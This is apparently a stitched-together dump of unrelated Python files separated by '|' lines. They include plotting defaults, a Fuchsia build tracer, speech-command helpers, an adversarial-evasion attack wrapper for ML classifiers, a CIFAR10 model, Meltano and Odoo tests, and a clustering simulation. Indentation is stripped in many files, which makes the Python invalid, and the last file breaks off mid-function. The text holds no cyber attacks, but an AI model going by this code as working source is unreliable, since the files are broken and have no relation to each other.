import matplotlib as mpl
import matplotlib.font_manager
def mydefaults(fig, ax, r=0.51, s=1):
"""
Parameters
----------
fig, ax : figure and axes handle from matplotlib
r : height/width ratio
s : scaling of font size
Example
-------
from mydefaults import mydefaults
fig, ax = mpl.pyplot.subplots()
fig, ax = mydefaults(fig, ax)
"""
#fig, ax = mpl.pyplot.subplots()
# Specify fig size
fig.set_size_inches(s*(13.2/2.54), s*r*(13.2/2.54), forward=True)
# Use tex and correct font
#mpl.rcParams['font.family'] = 'Serif'
mpl.rcParams['font.serif'] = ['computer modern roman']
#mpl.rcParams['text.usetex'] = True # makes zeros bold?
mpl.rcParams['font.size'] = 11
mpl.rcParams['font.weight'] = 'normal'
# MATLAB default (see MATLAB Axes Properties documentation)
mpl.rcParams['axes.titlesize'] = 1.1*11
mpl.rcParams['axes.titleweight'] = 'bold'
# MATLAB default (see MATLAB Axes Properties documentation)
mpl.rcParams['axes.labelsize'] = 1.1*11
mpl.rcParams['axes.labelweight'] = 'normal'
# MATLAB default (see MATLAB Axes Properties documentation)
mpl.rcParams['legend.fontsize'] = 0.9*11
    # remove margin padding on the axes
mpl.rcParams['axes.xmargin'] = 0
mpl.rcParams['axes.ymargin'] = 0
# switch tick direction like MATLAB
mpl.rcParams['xtick.direction'] = 'in'
mpl.rcParams['ytick.direction'] = 'in'
mpl.pyplot.tight_layout(pad=1.3) # padding as fraction of font size
if isinstance(ax, tuple):
for axi in ax:
axi.tick_params(axis='both', which='both', direction='in')
else:
ax.tick_params(axis='both', which='both', direction='in')
# Save fig with transparent background
mpl.rcParams['savefig.transparent'] = True
# Make legend frame border black and face white
mpl.rcParams['legend.edgecolor'] = 'k'
mpl.rcParams['legend.facecolor'] = 'w'
mpl.rcParams['legend.framealpha'] = 1
    # Change the color cycle to MATLAB's default
c = mpl.cycler(color=['#0072BD', '#D95319', '#EDB120', '#4DBEEE', '#77AC30', '#7E2F8E', '#A2142F'])
if isinstance(ax, tuple):
for axi in ax:
axi.set_prop_cycle(c)
else:
ax.set_prop_cycle(c)
    # mpl.rcParams['axes.prop_cycle'] = c  # doesn't work?
return fig, ax
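# Illustrative usage sketch (assumes this file is importable as `mydefaults` and that
# numpy/matplotlib are installed; names below are only for demonstration):
#
#     import numpy as np
#     import matplotlib.pyplot as plt
#     from mydefaults import mydefaults
#
#     fig, ax = plt.subplots()
#     fig, ax = mydefaults(fig, ax, r=0.6, s=1)
#     x = np.linspace(0, 2 * np.pi, 200)
#     ax.plot(x, np.sin(x))
#     fig.savefig('example.pdf')  # transparent background per savefig.transparent above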
|
# -*- coding: utf-8 -*-
__version__ = '0.1.0'
try:
__PANDAS_SHOULD_SETUP__
except NameError:
__PANDAS_SHOULD_SETUP__ = False
if not __PANDAS_SHOULD_SETUP__:
from . import dataframe
from . import series
|
#!/usr/bin/env python3
# Copyright 2020 The Fuchsia Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import os
import subprocess
import sys
def main():
parser = argparse.ArgumentParser(
description="Traces a GN action and enforces strict inputs/outputs",
argument_default=[],
)
parser.add_argument(
"--label", required=True, help="The wrapped target's label")
parser.add_argument(
"--trace-output", required=True, help="Where to store the trace")
parser.add_argument(
"--target-type",
choices=["action", "action_foreach"],
default="action",
help="Type of target being wrapped",
)
parser.add_argument("--script", required=True, help="action#script")
parser.add_argument("--response-file-name", help="action#script")
parser.add_argument("--inputs", nargs="*", help="action#inputs")
parser.add_argument("--sources", nargs="*", help="action#sources")
parser.add_argument("--outputs", nargs="*", help="action#outputs")
parser.add_argument("--depfile", help="action#depfile")
parser.add_argument("args", nargs="*", help="action#args")
args = parser.parse_args()
# Ensure trace_output directory exists
trace_output_dir = os.path.dirname(args.trace_output)
os.makedirs(trace_output_dir, exist_ok=True)
# TODO(shayba): make this work without assuming `fsatrace` in path
retval = subprocess.call(
["fsatrace", "rwmdt", args.trace_output, "--", args.script] + args.args)
# If inner action failed that's a build error, don't bother with the trace.
if retval != 0:
return retval
# Scripts with known issues
# TODO(shayba): file bugs for the suppressions below
ignored_scripts = [
"sdk_build_id.py",
# TODO(shayba): it's not the wrapper script that's the problem but some
# of its usages. Refine the suppression or just fix the underlying
# issues.
"gn_script_wrapper.py",
# When using `/bin/ln -f`, a temporary file may be created in the
# target directory. This will register as a write to a non-output file.
# TODO(shayba): address this somehow.
"ln",
# fxbug.dev/61771
# "analysis_options.yaml",
]
if os.path.basename(args.script) in ignored_scripts:
return 0
# `compiled_action()` programs with known issues
# TODO(shayba): file bugs for the suppressions below
ignored_compiled_actions = [
# fxbug.dev/61770
"banjo_bin",
"strings_to_json",
]
if args.script == "../../build/gn_run_binary.sh":
if os.path.basename(args.args[1]) in ignored_compiled_actions:
return 0
# Paths that the action is allowed to access
allowed_write = [os.path.abspath(path) for path in args.outputs]
depfile_deps = []
if args.depfile:
allowed_write.append(os.path.abspath(args.depfile))
with open(args.depfile, "r") as f:
depfile_deps += [
line.partition(":")[0]
for line in f.read().strip().splitlines()
]
allowed_read = [
os.path.abspath(path)
for path in [args.script] + args.inputs + args.sources + depfile_deps
] + allowed_write
if args.response_file_name:
        allowed_read.append(os.path.abspath(args.response_file_name))
# Paths that are ignored
src_root = os.path.dirname(os.path.dirname(os.getcwd()))
ignored_prefix = [
# Allow actions to access prebuilts that are not declared as inputs
# (until we fix all instances of this)
os.path.join(src_root, "prebuilt"),
]
ignored_postfix = [
# Allow actions to access Python code such as via imports
".py",
# Allow actions to access Python compiled bytecode
".pyc",
# TODO(shayba): remove hack below for response files
#".rsp",
]
# Verify the filesystem access trace of the inner action
with open(args.trace_output, "r") as trace:
for line in trace.read().splitlines():
if not line[1] == "|":
# Not a trace line, ignore
continue
path = line[2:]
if not path.startswith(src_root):
# Outside of root, ignore
continue
if any(path.startswith(ignored) for ignored in ignored_prefix):
continue
if any(path.endswith(ignored) for ignored in ignored_postfix):
continue
op = line[0]
if op == "r":
if not path in allowed_read:
print(
f"ERROR: {args.label} read {path} but it is not a specified input!",
file=sys.stderr,
)
return 1
elif op in ("w", "d", "t"):
if not path in allowed_write:
print(
f"ERROR: {args.label} wrote {path} but it is not a specified output!",
file=sys.stderr,
)
return 1
elif op == "m":
for path in path.split("|"):
if not path in allowed_write:
print(
f"ERROR: {args.label} wrote {path} but it is not a specified output!",
file=sys.stderr,
)
return 1
# All good!
return 0
if __name__ == "__main__":
sys.exit(main())
|
import numpy as np
from scipy.io import wavfile  # needed by action_accuracy() below
def character_mapper(char_map = " abcdefghijklmnopqrstuvwxyz'"):
'''
    Creates two dictionaries that are used to convert words to integer arrays and vice versa.
    :params:
    char_map - String, all characters that may occur in resulting words
    :return:
    id_to_char - Python dictionary, maps integer ids to characters (with respect to the char_map)
    char_to_id - Python dictionary, maps characters to integer ids (with respect to the char_map)
'''
id_to_char = {i+1:j for i,j in enumerate(char_map)}
char_to_id = {j:i+1 for i,j in enumerate(char_map)}
return id_to_char, char_to_id
def word_to_int(word, char_to_id):
'''
Converts word to its Integer representation
:params:
word - String, input word that is converted to an integer representation
    char_to_id - Python dictionary, maps characters to integer ids (with respect to the char_map)
:returns:
numpy array with an integer representation of the input word
'''
return np.array([char_to_id[c] for c in word])
def int_to_word(word_array, id_to_char):
'''
Converts an Integer array to its word/string representation.
:params:
word_array - Numpy array, an Integer representation that is used to 'recover' a word
    id_to_char - Python dictionary, maps integer ids to characters (with respect to the char_map)
:returns:
result_string - String, resulting word/string representation of the input word_array
'''
result_string = ""
    for c in word_array:
result_string += id_to_char[c]
return result_string
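# Illustrative round trip (sketch):
#   id_to_char, char_to_id = character_mapper()
#   encoded = word_to_int("cat", char_to_id)    # -> array([ 4,  2, 21])
#   decoded = int_to_word(encoded, id_to_char)  # -> "cat"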
def action_accuracy(generator, model):
'''
Use this function to test the accuracy of classification model only on actions
'''
actions = ['yes',
'no',
'up',
'down',
'left',
'right',
'on',
'off',
'stop',
'go']
correct = 0
counter = 0
for sample_path in generator.testing_files:
t, sample = wavfile.read(sample_path)
sample = generator.featurize(sample)
pred = generator.classes[np.argmax(model.predict(np.array([sample])))]
if pred == sample_path.split("/")[-2] and pred in actions:
correct += 1
if sample_path.split("/")[-2] in actions:
counter += 1
return correct/counter
|
import fileinput
# Note: print() adds its own newline, so rstrip each line before printing
file = "index.html"
findtag = "<script type"
inserttag = '<script type="text/javascript" src="playermarkers/playermarkers.js"></script>'
found = 0
for line in fileinput.input(file, inplace=True, backup=".bak"):
    if line == "\n" or line == "\r\n":
        print(line.rstrip())
    elif line.startswith(findtag):
        found = 1
        print(line.rstrip())
    elif not line.startswith(findtag) and found == 1:
        found = 0
        print(inserttag)
        print(line.rstrip())
    else:
        print(line.rstrip())
|
"""
.. module:: CAttackEvasionFoolbox
:synopsis: Performs one of the Foolbox Evasion attacks
against a classifier.
.. moduleauthor:: Luca Demetrio <luca.demetrio@dibris.unige.it>
.. moduleauthor:: Maura Pintor <maura.pintor@unica.it>
"""
import eagerpy as ep
import foolbox as fb
import torch
from eagerpy import PyTorchTensor
from numpy import NaN
from secml.adv.attacks.evasion import CAttackEvasion
from secml.adv.attacks.evasion.foolbox.secml_autograd import \
SecmlLayer, as_tensor, as_carray
from secml.array import CArray
from secml.core.constants import inf
from secml.settings import SECML_PYTORCH_USE_CUDA
use_cuda = torch.cuda.is_available() and SECML_PYTORCH_USE_CUDA
class CAttackEvasionFoolbox(CAttackEvasion):
"""
Wrapper for the attack classes in Foolbox library.
Credits: https://foolbox.readthedocs.io/en/stable/.
Requires foolbox >= 3.3.0.
Parameters
----------
classifier : CClassifier
Trained secml classifier.
y_target : int or None, optional
If None an indiscriminate attack will be performed, else a
targeted attack to have the samples misclassified as
belonging to the y_target class.
lb : float or None, optional
Lower bound of the model's input space.
ub : float or None, optional
Upper bound of the model's input space.
epsilons : float or None, optional
The maximum size of the perturbations, required for the
fixed epsilon foolbox attacks.
fb_attack_class : fb.attacks.Attack
Attack class to wrap from Foolbox.
**attack_params : any
Init parameters for creating the attack, as kwargs.
"""
__class_type = 'e-foolbox'
def __init__(self, classifier, y_target=None, lb=0.0, ub=1.0,
epsilons=None, fb_attack_class=None, **attack_params):
super(CAttackEvasionFoolbox, self).__init__(
classifier=classifier,
y_target=y_target)
self.attack_params = attack_params
self.attack_class = fb_attack_class
self.lb = lb
self.ub = ub
# wraps secml classifier in a pytorch layer
self._pytorch_model_wrapper = SecmlLayer(classifier)
# wraps the pytorch model in the foolbox pytorch wrapper
self.f_model = _FoolboxModel(self._pytorch_model_wrapper,
bounds=(lb, ub))
self._last_f_eval = None
self._last_grad_eval = None
self._n_classes = self.classifier.n_classes
self._n_feats = self.classifier.n_features
self.epsilon = epsilons
self.dmax = epsilons if epsilons is not None else inf
self.attack = self.attack_class(**self.attack_params)
def _run(self, x, y, x_init=None):
self.f_model.reset()
if self.y_target is None:
criterion = fb.criteria.Misclassification(
as_tensor(y.ravel().astype('int64')))
else:
criterion = fb.criteria.TargetedMisclassification(
torch.tensor([self.y_target]))
x_t = as_tensor(x, requires_grad=False)
advx, clipped, is_adv = self.attack(
self.f_model, x_t, criterion, epsilons=self.epsilon)
if isinstance(clipped, list):
if len(clipped) == 1:
                clipped = clipped[0]
else:
raise ValueError(
"This attack is returning a list. Please,"
"use a single value of epsilon.")
# f_opt is computed only in class-specific wrappers
f_opt = NaN
self._last_f_eval = self.f_model.f_eval
self._last_grad_eval = self.f_model.grad_eval
path = self.f_model.x_path
self._x_seq = CArray(path.numpy())
# reset again to clean cached data
self.f_model.reset()
return as_carray(clipped), f_opt
def objective_function(self, x):
return as_carray(self._adv_objective_function(as_tensor(x)))
def objective_function_gradient(self, x):
x_t = as_tensor(x).detach()
x_t.requires_grad_()
loss = self._adv_objective_function(x_t)
loss.sum().backward()
gradient = x_t.grad
return as_carray(gradient)
def _adv_objective_function(self, x):
raise NotImplementedError(
"Objective Function and Objective Function Gradient "
"are not supported with this constructor. Please, "
"use one of our wrapper-supported attacks.")
@property
def x_seq(self):
return self._x_seq
@property
def f_eval(self):
if self._last_f_eval is not None:
return self._last_f_eval
else:
raise RuntimeError("Attack not run yet!")
@property
def grad_eval(self):
if self._last_grad_eval is not None:
return self._last_grad_eval
else:
raise RuntimeError("Attack not run yet!")
class _FoolboxModel(fb.models.PyTorchModel):
"""Wraps a model and tracks function calls."""
def __init__(self, model, bounds, store_path=True):
self._original_model = model
self._f_eval = 0
self._grad_eval = 0
self._store_path = store_path
self._x_path = []
if not isinstance(model, torch.nn.Module):
raise ValueError(
"expected model to be a torch.nn.Module instance")
device = 'cuda' if use_cuda else 'cpu'
super().__init__(
model, bounds=bounds, preprocessing=None, device=device,
)
self.data_format = "channels_first"
@property
def bounds(self):
return self._bounds
@property
def x_path(self):
path = ep.concatenate(self._x_path, axis=0)
return path[:-1, ...] # removes last point
@property
def f_eval(self):
return self._original_model.func_counter.item()
@property
def grad_eval(self):
return self._original_model.grad_counter.item()
def __call__(self, x, *args, **kwargs):
x_t = x.raw.type(torch.float)
scores = self._model(x_t)
if self._store_path is True:
self._x_path.append(x)
return PyTorchTensor(scores)
def reset(self):
"""Resets the query counter."""
self._original_model.func_counter.zero_()
self._original_model.grad_counter.zero_()
if self._store_path is True:
self._x_path = list()
|
class MatchQuantity:
def __init__(self, matcher, min_n = 0, max_n = -1):
self.matcher = matcher
self.min = min_n
self.max = max_n
def parser(self, body : str, hard_fail = True):
head = 0
count = 0
result = []
while True:
sub_body = body[head:]
# If max is specified and we've reached it
if self.max > 0 and self.max == count:
# return the result and the head
return (result, head)
match = self.matcher.parser(sub_body, hard_fail = False)
if not match or head == len(body):
break
head += match[1]
result.append(match[0])
count += 1
if count < self.min:
if hard_fail:
raise ValueError(f"MatchQuantity: less than minimum matches")
else:
return False
return (result, head)
def to_string(self, call_count = 0):
return f"({self.matcher.to_string(call_count)}){{{self.min},{self.max}}}"
def __str__(self):
return self.to_string()
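# Illustrative usage sketch. `MatchLiteral` below is a hypothetical minimal matcher, defined
# here only to demonstrate the (result, consumed) protocol that MatchQuantity.parser expects.
if __name__ == "__main__":
    class MatchLiteral:
        def __init__(self, literal):
            self.literal = literal
        def parser(self, body, hard_fail=True):
            # Return (matched text, characters consumed), or False on no match.
            if body.startswith(self.literal):
                return (self.literal, len(self.literal))
            return False
        def to_string(self, call_count=0):
            return self.literal
    # Greedily match "ab" at least once: -> (['ab', 'ab'], 4)
    print(MatchQuantity(MatchLiteral("ab"), min_n=1).parser("ababx"))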
|
"""
Credits: https://github.com/aaron-xichen/pytorch-playground
"""
import torch
import torch.nn as nn
import torch.utils.model_zoo as model_zoo
CIFAR10_PRETRAINED_URL = 'http://ml.cs.tsinghua.edu.cn/~chenxi/pytorch-models/cifar10-d875770b.pth'
def make_feature_layers(cfg, batch_norm=False):
layers = []
in_channels = 3
for i, v in enumerate(cfg):
if v == 'M':
layers.append(nn.MaxPool2d(kernel_size=2, stride=2))
else:
padding = v[1] if isinstance(v, tuple) else 1
out_channels = v[0] if isinstance(v, tuple) else v
conv2d = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=padding)
layers.append(conv2d)
if batch_norm:
layers.append(nn.BatchNorm2d(out_channels, affine=False))
layers.append(nn.ReLU())
in_channels = out_channels
return nn.Sequential(*layers)
class CIFAR10(nn.Module):
def __init__(self, n_channel=128, num_classes=10, pretrained=False):
super().__init__()
cfg = [n_channel, n_channel, 'M', 2 * n_channel, 2 * n_channel, 'M', 4 * n_channel, 4 * n_channel, 'M',
(8 * n_channel, 0), 'M']
self.features = make_feature_layers(cfg, batch_norm=True)
self.classifier = nn.Sequential(
nn.Linear(8 * n_channel, num_classes)
)
if pretrained:
map_location = None
if not torch.cuda.is_available():
map_location = 'cpu'
state_dict = model_zoo.load_url(CIFAR10_PRETRAINED_URL, map_location=map_location)
self.load_state_dict(state_dict)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.classifier(x)
return x
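# Illustrative instantiation (sketch; loading pretrained weights requires network access):
#   model = CIFAR10(n_channel=128, num_classes=10, pretrained=False)
#   logits = model(torch.zeros(1, 3, 32, 32))  # -> tensor of shape (1, 10)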
|
# Python - 2.7.6
def decodeMorse(morseCode):
morseCode = morseCode.strip(' ').replace(' ', ' % ')
return ''.join([MORSE_CODE.get(code, ' ') for code in morseCode.split(' ')])
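# MORSE_CODE is expected to be preloaded by the surrounding environment (e.g. the kata).
# Minimal local check (sketch, single letter so word spacing is not involved):
#   MORSE_CODE = {'....': 'H'}
#   decodeMorse("....")  # -> "H"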
|
import sys
import click
from .. import shared
@shared.cli.command()
@click.argument("name1", required=True)
@click.argument("name2", required=True)
@click.pass_context
def diff(ctx, name1, name2):
"""Compare two documents."""
# yew = ctx.obj["YEW"]
doc1 = shared.get_document_selection(ctx, name1, list_docs=False)
doc2 = shared.get_document_selection(ctx, name2, list_docs=False)
"""Compare two documents."""
s = shared.diff_content(
doc1.get_content().rstrip().splitlines(),
doc2.get_content().rstrip().splitlines(),
)
click.echo(s)
|
from hm_env import HMEnv
from pprint import pprint
from stable_baselines.common.policies import MlpPolicy, CnnLstmPolicy
from stable_baselines.common.vec_env import DummyVecEnv
from stable_baselines import PPO2
import datetime
import matplotlib.pyplot as plt
import config as cfg
from tqdm import tqdm
def print_env(e: HMEnv):
for hw in e.highways:
print(hw)
print('=' * 10)
def train(total_timesteps):
env = HMEnv()
model = PPO2(MlpPolicy, env, verbose=1)
model.learn(total_timesteps=total_timesteps)
# save
cur_time = datetime.datetime.now()
filename = "{}{}{}-{}{}{}-step_{}".format(cur_time.year, cur_time.month, cur_time.day,
cur_time.hour, cur_time.minute, cur_time.second,
total_timesteps)
model.save('../models/{}'.format(filename))
def test(path: str):
model = PPO2.load(path)
data = [[[], [], cfg.HIGHWAYS[i]['name']] for i in range(len(cfg.HIGHWAYS))]
max_time = 3 * cfg.DAY_PER_YEAR
record_interval = 1
env = HMEnv()
obs = env.reset()
for step in tqdm(range(max_time)):
action, _states = model.predict(obs)
obs, reward, done, info = env.step(action)
# record
if step % record_interval == 0:
for i in range(len(cfg.HIGHWAYS)):
data[i][0].append(step)
data[i][1].append(env.highways[i].hp)
# plot
for single_data in data:
x, y, note = single_data
plt.plot(x, y, label=note)
plt.legend()
plt.show()
def foo():
env = HMEnv()
act = [3] * len(cfg.HIGHWAYS)
for i in range(10):
obs, reward, done, info = env.step(act)
print(reward)
if __name__ == "__main__":
# train(100000)
|
import os
import pytest
import functools
from unittest import mock
from asserts import assert_cli_runner
from meltano.cli import cli
from meltano.core.plugin import PluginType
from meltano.core.plugin_install_service import PluginInstallReason
from meltano.core.plugin.error import PluginMissingError
from meltano.core.m5o.dashboards_service import DashboardsService
from meltano.core.m5o.reports_service import ReportsService
class TestCliAdd:
@pytest.mark.parametrize(
"plugin_type,plugin_name,file_plugin_name",
[
(PluginType.EXTRACTORS, "tap-carbon-intensity", None),
(PluginType.LOADERS, "target-sqlite", None),
(PluginType.TRANSFORMS, "tap-carbon-intensity", None),
(PluginType.MODELS, "model-carbon-intensity", None),
(PluginType.DASHBOARDS, "dashboard-google-analytics", None),
(PluginType.ORCHESTRATORS, "airflow", "airflow"),
(PluginType.TRANSFORMERS, "dbt", "dbt"),
],
)
def test_add(
self,
plugin_type,
plugin_name,
file_plugin_name,
project,
cli_runner,
config_service,
):
# ensure the plugin is not present
with pytest.raises(PluginMissingError):
config_service.find_plugin(plugin_name, plugin_type=plugin_type)
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
install_plugin_mock.return_value = True
res = cli_runner.invoke(cli, ["add", plugin_type.singular, plugin_name])
assert res.exit_code == 0, res.stdout
assert f"Added {plugin_type.descriptor} '{plugin_name}'" in res.stdout
plugin = config_service.find_plugin(plugin_name, plugin_type)
assert plugin
plugins = [plugin]
if file_plugin_name:
assert f"Added related file bundle '{file_plugin_name}'" in res.stdout
file_plugin = config_service.find_plugin(
file_plugin_name, PluginType.FILES
)
assert file_plugin
plugins.append(file_plugin)
install_plugin_mock.assert_called_once_with(
project, plugins, reason=PluginInstallReason.ADD
)
def test_add_multiple(self, project, cli_runner, config_service):
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
install_plugin_mock.return_value = True
cli_runner.invoke(cli, ["add", "extractors", "tap-gitlab"])
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
res = cli_runner.invoke(
cli, ["add", "extractors", "tap-gitlab", "tap-adwords", "tap-facebook"]
)
assert res.exit_code == 0, res.stdout
assert (
f"Extractor 'tap-gitlab' is already in your Meltano project"
in res.stderr
)
assert f"Added extractor 'tap-adwords'" in res.stdout
assert f"Added extractor 'tap-facebook'" in res.stdout
tap_gitlab = config_service.find_plugin("tap-gitlab", PluginType.EXTRACTORS)
assert tap_gitlab
tap_adwords = config_service.find_plugin(
"tap-adwords", PluginType.EXTRACTORS
)
assert tap_adwords
tap_facebook = config_service.find_plugin(
"tap-facebook", PluginType.EXTRACTORS
)
assert tap_facebook
install_plugin_mock.assert_called_once_with(
project,
[tap_gitlab, tap_adwords, tap_facebook],
reason=PluginInstallReason.ADD,
)
def test_add_transform(self, project, cli_runner):
# Add dbt and transform/ files
cli_runner.invoke(cli, ["add", "transformer", "dbt"])
cli_runner.invoke(cli, ["add", "files", "dbt"])
res = cli_runner.invoke(cli, ["add", "transform", "tap-google-analytics"])
assert res.exit_code == 0
assert (
"dbt-tap-google-analytics"
in project.root_dir("transform/packages.yml").open().read()
)
assert (
"tap_google_analytics"
in project.root_dir("transform/dbt_project.yml").open().read()
)
def test_add_dashboard(self, project, cli_runner):
def install():
return cli_runner.invoke(
cli, ["add", "dashboard", "dashboard-google-analytics"]
)
res = install()
assert res.exit_code == 0
dashboards_service = DashboardsService(project)
dashboards_count = len(dashboards_service.get_dashboards())
assert dashboards_count > 0
reports_service = ReportsService(project)
reports_count = len(reports_service.get_reports())
assert reports_count > 0
# Verify that reinstalling doesn't duplicate dashboards and reports
res = install()
assert res.exit_code == 0
assert len(dashboards_service.get_dashboards()) == dashboards_count
assert len(reports_service.get_reports()) == reports_count
def test_add_files_with_updates(
self, session, project, cli_runner, config_service, plugin_settings_service
):
result = cli_runner.invoke(cli, ["add", "files", "airflow"])
assert_cli_runner(result)
# Plugin has been added to meltano.yml
plugin = config_service.find_plugin("airflow", PluginType.FILES)
assert plugin
# Automatic updating is enabled
value, _ = plugin_settings_service.get_value(
session, plugin, "update.orchestrate/dags/meltano.py"
)
assert value == True
# File has been created
assert "Created orchestrate/dags/meltano.py" in result.output
file_path = project.root_dir("orchestrate/dags/meltano.py")
assert file_path.is_file()
# File has "managed" header
assert (
"This file is managed by the 'airflow' file bundle" in file_path.read_text()
)
def test_add_files_without_updates(self, project, cli_runner, config_service):
result = cli_runner.invoke(cli, ["add", "files", "docker-compose"])
assert_cli_runner(result)
# Plugin has not been added to meltano.yml
with pytest.raises(PluginMissingError):
config_service.find_plugin("docker-compose", PluginType.FILES)
# File has been created
assert "Created docker-compose.yml" in result.output
file_path = project.root_dir("docker-compose.yml")
assert file_path.is_file()
# File does not have "managed" header
assert "This file is managed" not in file_path.read_text()
def test_add_files_that_already_exists(self, project, cli_runner, config_service):
project.root_dir("transform/dbt_project.yml").write_text("Exists!")
result = cli_runner.invoke(cli, ["add", "files", "dbt"])
assert_cli_runner(result)
assert (
"File transform/dbt_project.yml already exists, keeping both versions"
in result.output
)
assert "Created transform/dbt_project (dbt).yml" in result.output
assert project.root_dir("transform/dbt_project (dbt).yml").is_file()
def test_add_related(self, project, cli_runner, config_service):
# Add dbt and transform/ files
cli_runner.invoke(cli, ["add", "transformer", "dbt"])
cli_runner.invoke(cli, ["add", "files", "dbt"])
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
install_plugin_mock.return_value = True
res = cli_runner.invoke(
cli, ["add", "--include-related", "extractor", "tap-gitlab"]
)
assert res.exit_code == 0
tap = config_service.find_plugin("tap-gitlab", PluginType.EXTRACTORS)
assert tap
transform = config_service.find_plugin("tap-gitlab", PluginType.TRANSFORMS)
assert transform
model = config_service.find_plugin("model-gitlab", PluginType.MODELS)
assert model
dashboard = config_service.find_plugin(
"dashboard-gitlab", PluginType.DASHBOARDS
)
assert dashboard
install_plugin_mock.assert_called_once_with(
project,
[tap, transform, model, dashboard],
reason=PluginInstallReason.ADD,
)
def test_add_missing(self, project, cli_runner, config_service):
res = cli_runner.invoke(cli, ["add", "extractor", "tap-unknown"])
assert res.exit_code == 1
assert "extractor 'tap-unknown' is not known to Meltano" in res.stdout
assert res.stderr
# ensure the plugin is not present
with pytest.raises(PluginMissingError):
config_service.find_plugin("tap-unknown", PluginType.EXTRACTORS)
@pytest.mark.xfail(reason="Uninstall not implemented yet.")
def test_add_fails(self, project, cli_runner, config_service):
res = cli_runner.invoke(cli, ["add", "extractor", "tap-mock"])
assert res.exit_code == 1, res.stdout
assert "Failed to install plugin 'tap-mock'" in res.stdout
assert res.stderr
# ensure the plugin is not present
with pytest.raises(PluginMissingError):
config_service.find_plugin("tap-mock", PluginType.EXTRACTORS)
def test_add_custom(self, project, cli_runner, config_service):
stdin = os.linesep.join(
            # namespace, pip_url, executable
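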
["custom", "-e path/to/tap-custom", "tap-custom-bin"]
)
with mock.patch("meltano.cli.add.install_plugins") as install_plugin_mock:
install_plugin_mock.return_value = True
res = cli_runner.invoke(
cli, ["add", "--custom", "extractor", "tap-custom"], input=stdin
)
plugin = config_service.find_plugin("tap-custom", PluginType.EXTRACTORS)
assert plugin.name == "tap-custom"
assert plugin.executable == "tap-custom-bin"
install_plugin_mock.assert_called_once_with(
project, [plugin], reason=PluginInstallReason.ADD
)
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import odoo.tests
@odoo.tests.common.at_install(False)
@odoo.tests.common.post_install(True)
class TestUi(odoo.tests.HttpCase):
def test_01_wishlist_tour(self):
self.start_tour("/", 'shop_wishlist')
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# model 3-4: cluster points that lie close to one another
#
# Relationship between the number $N$ of $X_{i}$ and the mean inter-step distance $\phi$
# Note: this takes a long time to run.
import matplotlib.pyplot as plt
import numpy as np
from scipy.spatial.distance import euclidean as euc
import collections
import operator
import random
import bisect
from itertools import chain
from scipy.optimize import leastsq
__author__ = 'Shotaro Fujimoto'
def uniq_list(seq):
seen = set()
seen_add = seen.add
return [x for x in seq if x not in seen and not seen_add(x)]
def accumulate(iterable, func=operator.add):
"""Return running totals
Usage:
accumulate([1,2,3,4,5]) --> 1 3 6 10 15
accumulate([1,2,3,4,5], operator.mul) --> 1 2 6 24 120
"""
it = iter(iterable)
total = next(it)
yield total
for element in it:
total = func(total, element)
yield total
def weighted_choice(d):
choices, weights = zip(*d)
cumdist = list(accumulate(weights))
x = random.random() * cumdist[-1]
return choices[bisect.bisect(cumdist, x)]
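# Illustrative draw (sketch): with weights 1.0 and 3.0, 'b' is returned about 75% of the time.
#   weighted_choice([('a', 1.0), ('b', 3.0)])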
class Person:
def __init__(self, master, id, ideas, w):
"""Initialize argmunets.
Keyword arguments:
master : Master class (call from "Meeting")
self.id : Id for each person [0, 1, ..., N-1]
self.ideas: ideas in space [0,1] × [0,1]
self.w : probability weight for the person to speak
"""
self.id = id
self.ideas = ideas
self.w = w
# add_ideas : place, tag : (x, y), [person_id, cluster_id]
master.ideas += [[(i1, i2), [self.id, 0, self.w]]
for i1, i2 in self.ideas]
class Cluster:
def __init__(self, ideas, r):
"""make cluster with self.r
cluster_link:
"""
self.ideas = ideas
self.r = r
self.l = 0
self.cluster_link = []
self.clustering()
def clustering(self):
self.cell_num = int(1. / self.r)
lr = 1. / self.cell_num
self.cell = dict() # key: (cellx,celly), value: list of ids
self.rcell = []
for i, idea in enumerate(self.ideas):
cellx = int(idea[0][0] / lr)
celly = int(idea[0][1] / lr)
            if (cellx, celly) in self.cell:
self.cell[(cellx, celly)] += [i]
else:
self.cell[(cellx, celly)] = [i]
self.rcell.append((cellx, celly))
num = 1
for i in range(len(self.ideas)):
num += self.find_nearest(i, num)
return self.cluster_link
def find_nearest(self, idea_id, num):
"""find nearest idea
idea_id: index in self.ideas
"""
cx, cy = self.rcell[idea_id]
place = self.ideas[idea_id][0]
CX = uniq_list([max(0, cx - 1), cx, min(cx + 1, self.cell_num - 1)])
CY = uniq_list([max(0, cy - 1), cy, min(cy + 1, self.cell_num - 1)])
        tmp = [self.cell[(i, j)]
               for i in CX for j in CY if (i, j) in self.cell]
tmp = list(chain.from_iterable(tmp))
tmp.remove(idea_id)
if len(tmp) == 0:
self.ideas[idea_id][1][1] = num
return 1
nearest = []
cid = [num]
for k in tmp:
if euc(self.ideas[k][0], place) > self.r:
continue
nearest.append(k)
prenum = self.ideas[k][1][1]
if prenum == 0:
cid.append(num)
self.cluster_link.append((idea_id, k))
elif prenum < num:
cid.append(prenum)
if not (k, idea_id) in self.cluster_link:
self.cluster_link.append((idea_id, k))
self.l += len(nearest)
cluster_id = min(cid)
if cluster_id < num:
ans = 0
else:
ans = 1
self.ideas[idea_id][1][1] = cluster_id
for i in nearest:
self.ideas[i][1][1] = cluster_id
cid.remove(num)
if len(cid) == 0:
return ans
cid.remove(cluster_id)
if len(cid) == 0:
return ans
for i in cid:
for x in self.ideas:
if x[1][1] == i:
x[1][1] = cluster_id
return ans
class Meeting:
def __init__(self, K, N, S=20, r=0.06, draw=True):
self.K = K
self.N = N
self.S = S
self.r = r
self.ideas = []
self.minutes = []
self.ave_l = 0
self.draw = draw
def gather_people(self, ideass=None, weights=None):
"""Gather participants.
Keyword arguments:
ideas : list of ideas for each person
ex) [((0.3,0.1),(0.2,0.5)), ((0.5,0.6))] when N = 2
weights: list of weights for the probability of the person to speak
"""
if not ideass:
x = np.random.rand(self.N, self.S * 2)
ideass = []
